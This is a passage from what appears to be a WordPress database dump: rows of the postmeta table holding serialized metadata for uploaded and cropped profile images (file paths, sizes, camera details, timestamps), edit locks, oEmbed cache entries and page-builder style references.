mage/jpeg\";s:8:\"filesize\";i:8131;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"cropped-sara-edwards1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62110;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:15:\"Canon EOS M50m2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1662479582\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2420,1753,'_oembed_43e855edf367c4108d6a31733eab41bd','{{unknown}}'),(2421,1753,'_edit_lock','1697206791:1'),(2422,1753,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:25:\"cropped-sara-edwards1.jpg\";}}'),(2423,1753,'_edit_last','1'),(2424,1754,'_wp_attached_file','2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg'),(2425,1754,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:56:\"2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg\";s:8:\"filesize\";i:15550;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:56:\"cropped-cropped-sara-edwards1-e1697206932891-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8032;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:15:\"Canon EOS M50m2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1662479582\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2426,1754,'_oembed_43e855edf367c4108d6a31733eab41bd','{{unknown}}'),(2427,1755,'_wp_attached_file','2022/04/cropped-cropped-cropped-Ryan-e1697207029774.jpg'),(2428,1755,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:55:\"2022/04/cropped-cropped-cropped-Ryan-e1697207029774.jpg\";s:8:\"filesize\";i:247530;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"cropped-cropped-cropped-Ryan-e1649958770354-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10360;}s:5:\"large\";a:5:{s:4:\"file\";s:57:\"cropped-cropped-cropped-Ryan-e1649958770354-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100478;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"cropped-cropped-cropped-Ryan-e1649958770354-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3875;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"cropped-cropped-cropped-Ryan-e1649958770354-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54068;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1576058051\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2429,1755,'_oembed_e7135b44271a7407470a47e2d6317b2e','{{unknown}}'),(2430,1755,'_edit_lock','1697206887:1'),(2431,1755,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1497;s:6:\"height\";i:1497;s:4:\"file\";s:47:\"cropped-cropped-cropped-Ryan-e1649958770354.jpg\";}}'),(2432,1755,'_edit_last','1'),(2433,1756,'_wp_attached_file','2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg'),(2434,1756,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:63:\"2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\";s:8:\"filesize\";i:10350;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:63:\"cropped-cropped-cropped-cropped-Ryan-e1697207029774-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3780;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1576058051\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2435,1756,'_oembed_e7135b44271a7407470a47e2d6317b2e','{{unknown}}'),(2436,874,'_edit_lock','1697206922:1'),(2437,874,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:21:\"cropped-Angelique.jpg\";}}'),(2438,874,'_edit_last','1'),(2439,1757,'_wp_attached_file','2022/03/cropped-cropped-Angelique-e1697207062254.jpg'),(2440,1757,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:52:\"2022/03/cropped-cropped-Angelique-e1697207062254.jpg\";s:8:\"filesize\";i:10805;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-Angelique-e1697207062254-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3534;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2441,1757,'_oembed_5a69c79d94917d98cd76f55e4aa509cf','{{unknown}}'),(2442,1394,'_edit_lock','1697207043:1'),(2443,1394,'_wp_attachment_backup_sizes','a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:553;s:6:\"height\";i:537;s:4:\"file\";s:40:\"Screen-Shot-2023-09-26-at-9.33.41-PM.png\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:48:\"Screen-Shot-2023-09-26-at-9.33.41-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37825;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:48:\"Screen-Shot-2023-09-26-at-9.33.41-PM-300x291.png\";s:5:\"width\";i:300;s:6:\"height\";i:291;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:127495;}s:18:\"full-1697207183631\";a:3:{s:5:\"width\";i:537;s:6:\"height\";i:537;s:4:\"file\";s:55:\"Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207175304.png\";}}'),(2444,1394,'_edit_last','1'),(2445,1758,'_wp_attached_file','2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png'),(2446,1758,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:71:\"2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\";s:8:\"filesize\";i:131434;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:71:\"cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36453;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2447,1758,'_oembed_42fd6605b521b1de559be801c9d6a17a','{{unknown}}'),(2448,1759,'_wp_attached_file','2023/10/md-shah-sayem.jpg'),(2449,1759,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:705;s:6:\"height\";i:705;s:4:\"file\";s:25:\"2023/10/md-shah-sayem.jpg\";s:8:\"filesize\";i:55519;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"md-shah-sayem-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10865;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"md-shah-sayem-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4058;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2450,1760,'_wp_attached_file','2023/10/cropped-md-shah-sayem-e1697207514119.jpg'),(2451,1760,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:48:\"2023/10/cropped-md-shah-sayem-e1697207514119.jpg\";s:8:\"filesize\";i:49925;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"cropped-md-shah-sayem-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10923;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"cropped-md-shah-sayem-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4053;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2452,1760,'_oembed_70b3ef6a1d97952330091c12af7704c4','{{unknown}}'),(2453,1760,'_edit_lock','1697207374:1'),(2454,1760,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:705;s:6:\"height\";i:705;s:4:\"file\";s:25:\"cropped-md-shah-sayem.jpg\";}}'),(2455,1760,'_edit_last','1'),(2456,1761,'_wp_attached_file','2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg'),(2457,1761,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:56:\"2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg\";s:8:\"filesize\";i:10917;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:56:\"cropped-cropped-md-shah-sayem-e1697207514119-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3921;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2458,1761,'_oembed_70b3ef6a1d97952330091c12af7704c4','{{unknown}}'),(2459,1417,'_edit_lock','1697207523:1'),(2460,1417,'_wp_attachment_backup_sizes','a:7:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1746;s:6:\"height\";i:1750;s:4:\"file\";s:73:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:81:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4097;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:81:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10568;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:81:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-768x770.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:770;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48245;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:83:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-1022x1024.jpg\";s:5:\"width\";i:1022;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77933;}s:14:\"1536x1536-orig\";a:5:{s:4:\"file\";s:83:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-1532x1536.jpg\";s:5:\"width\";i:1532;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151993;}s:18:\"full-1697207627160\";a:3:{s:5:\"width\";i:1746;s:6:\"height\";i:1747;s:4:\"file\";s:88:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207612475.jpg\";}}'),(2461,1417,'_edit_last','1'),(2465,1763,'_wp_attached_file','2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg'),(2466,1763,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:299;s:6:\"height\";i:300;s:4:\"file\";s:104:\"2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\";s:8:\"filesize\";i:10573;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:104:\"cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4087;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2467,1763,'_oembed_140be3c5637645a4fa18fadb21e68562','{{unknown}}'),(2468,1764,'_wp_attached_file','2023/10/cropped-IMG_9249-e1697207848252.jpg'),(2469,1764,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:43:\"2023/10/cropped-IMG_9249-e1697207848252.jpg\";s:8:\"filesize\";i:22712;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:43:\"cropped-IMG_9249-e1697207836897-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14678;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:43:\"cropped-IMG_9249-e1697207836897-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9462;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"iPhone 12 Pro Max\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1682286750\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"7.5\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.03030303030303\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2470,1764,'_oembed_31199b3441181accd67a48875d2f6ebd','{{unknown}}'),(2471,1764,'_edit_lock','1697207722:1'),(2472,1764,'_wp_attachment_backup_sizes','a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:460;s:6:\"height\";i:444;s:4:\"file\";s:20:\"cropped-IMG_9249.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:28:\"cropped-IMG_9249-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9532;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:28:\"cropped-IMG_9249-300x290.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:290;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14408;}s:18:\"full-1697207848252\";a:3:{s:5:\"width\";i:444;s:6:\"height\";i:444;s:4:\"file\";s:35:\"cropped-IMG_9249-e1697207836897.jpg\";}}'),(2473,1764,'_edit_last','1'),(2474,1765,'_wp_attached_file','2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg'),(2475,1765,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:51:\"2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg\";s:8:\"filesize\";i:14710;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:51:\"cropped-cropped-IMG_9249-e1697207848252-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9409;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"iPhone 12 Pro Max\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1682286750\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"7.5\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.03030303030303\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2476,1765,'_oembed_31199b3441181accd67a48875d2f6ebd','{{unknown}}'),(2477,1767,'extend_builder','a:2:{s:4:\"json\";i:562;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:211:{i:0;i:407;i:1;i:970;i:2;i:971;i:3;i:972;i:4;i:973;i:5;i:974;i:6;i:975;i:7;i:976;i:8;i:977;i:9;i:972;i:10;i:978;i:11;i:974;i:12;i:975;i:13;i:976;i:14;i:979;i:15;i:972;i:16;i:980;i:17;i:974;i:18;i:975;i:19;i:976;i:20;i:981;i:21;i:972;i:22;i:982;i:23;i:974;i:24;i:975;i:25;i:976;i:26;i:983;i:27;i:972;i:28;i:973;i:29;i:974;i:30;i:975;i:31;i:976;i:32;i:977;i:33;i:972;i:34;i:973;i:35;i:974;i:36;i:975;i:37;i:976;i:38;i:977;i:39;i:972;i:40;i:973;i:41;i:974;i:42;i:975;i:43;i:976;i:44;i:977;i:45;i:972;i:46;i:973;i:47;i:974;i:48;i:975;i:49;i:976;i:50;i:977;i:51;i:972;i:52;i:973;i:53;i:974;i:54;i:975;i:55;i:976;i:56;i:977;i:57;i:972;i:58;i:973;i:59;i:974;i:60;i:975;i:61;i:976;i:62;i:977;i:63;i:984;i:64;i:985;i:65;i:986;i:66;i:846;i:67;i:847;i:68;i:848;i:69;i:854;i:70;i:850;i:71;i:851;i:72;i:902;i:73;i:855;i:74;i:848;i:75;i:849;i:76;i:850;i:77;i:851;i:78;i:901;i:79;i:853;i:80;i:848;i:81;i:856;i:82;i:850;i:83;i:851;i:84;i:852;i:85;i:857;i:86;i:848;i:87;i:854;i:88;i:850;i:89;i:851;i:90;i:902;i:91;i:855;i:92;i:848;i:93;i:854;i:94;i:850;i:95;i:851;i:96;i:902;i:97;i:855;i:98;i:848;i:99;i:854;i:100;i:850;i:101;i:851;i:102;i:902;i:103;i:848;i:104;i:854;i:105;i:850;i:106;i:851;i:107;i:902;i:108;i:855;i:109;i:848;i:110;i:854;i:111;i:850;i:112;i:851;i:113;i:902;i:114;i:855;i:115;i:848;i:116;i:854;i:117;i:850;i:118;i:851;i:119;i:902;i:120;i:855;i:121;i:848;i:122;i:854;i:123;i:850;i:124;i:851;i:125;i:902;i:126;i:855;i:127;i:848;i:128;i:854;i:129;i:850;i:130;i:851;i:131;i:902;i:132;i:855;i:133;i:848;i:134;i:854;i:135;i:850;i:136;i:851;i:137;i:902;i:138;i:855;i:139;i:860;i:140;i:861;i:141;i:862;i:142;i:828;i:143;i:829;i:144;i:830;i:145;i:831;i:146;i:832;i:147;i:833;i:148;i:835;i:149;i:830;i:150;i:831;i:151;i:832;i:152;i:833;i:153;i:835;i:154;i:842;i:155;i:843;i:156;i:844;i:157;i:910;i:158;i:911;i:159;i:912;i:160;i:913;i:161;i:914;i:162;i:915;i:163;i:917;i:164;i:912;i:165;i:918;i:166;i:914;i:167;i:915;i:168;i:919;i:169;i:912;i:170;i:920;i:171;i:914;i:172;i:915;i:173;i:921;i:174;i:912;i:175;i:922;i:176;i:914;i:177;i:915;i:178;i:923;i:179;i:912;i:180;i:913;i:181;i:914;i:182;i:915;i:183;i:917;i:184;i:912;i:185;i:913;i:186;i:914;i:187;i:915;i:188;i:917;i:189;i:912;i:190;i:913;i:191;i:914;i:192;i:915;i:193;i:917;i:194;i:912;i:195;i:913;i:196;i:914;i:197;i:915;i:198;i:912;i:199;i:913;i:200;i:914;i:201;i:915;i:202;i:917;i:203;i:912;i:204;i:913;i:205;i:914;i:206;i:915;i:207;i:917;i:208;i:924;i:209;i:925;i:210;i:926;}}}'),(2478,1769,'extend_builder','a:2:{s:4:\"json\";i:26;s:4:\"meta\";a:4:{s:5:\"25-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(2479,1771,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(2482,1595,'_edit_lock','1697207976:1'),(2483,1595,'_wp_attachment_backup_sizes','a:7:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1919;s:6:\"height\";i:1918;s:4:\"file\";s:34:\"cropped-Sarah_Akinola-scaled-2.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:42:\"cropped-Sarah_Akinola-scaled-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5155;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:42:\"cropped-Sarah_Akinola-scaled-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17979;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:42:\"cropped-Sarah_Akinola-scaled-2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97490;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:44:\"cropped-Sarah_Akinola-scaled-2-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:157003;}s:14:\"1536x1536-orig\";a:5:{s:4:\"file\";s:44:\"cropped-Sarah_Akinola-scaled-2-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:298694;}s:18:\"full-1697208116294\";a:3:{s:5:\"width\";i:1919;s:6:\"height\";i:1918;s:4:\"file\";s:49:\"cropped-Sarah_Akinola-scaled-2-e1697208089733.jpg\";}}'),(2484,1595,'_edit_last','1'),(2485,1772,'_wp_attached_file','2022/03/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg'),(2486,1772,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:299;s:6:\"height\";i:300;s:4:\"file\";s:65:\"2022/03/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\";s:8:\"filesize\";i:17930;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4958;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2487,1772,'_oembed_d89a2d8557c016251bdf59df35ec26aa','{{unkno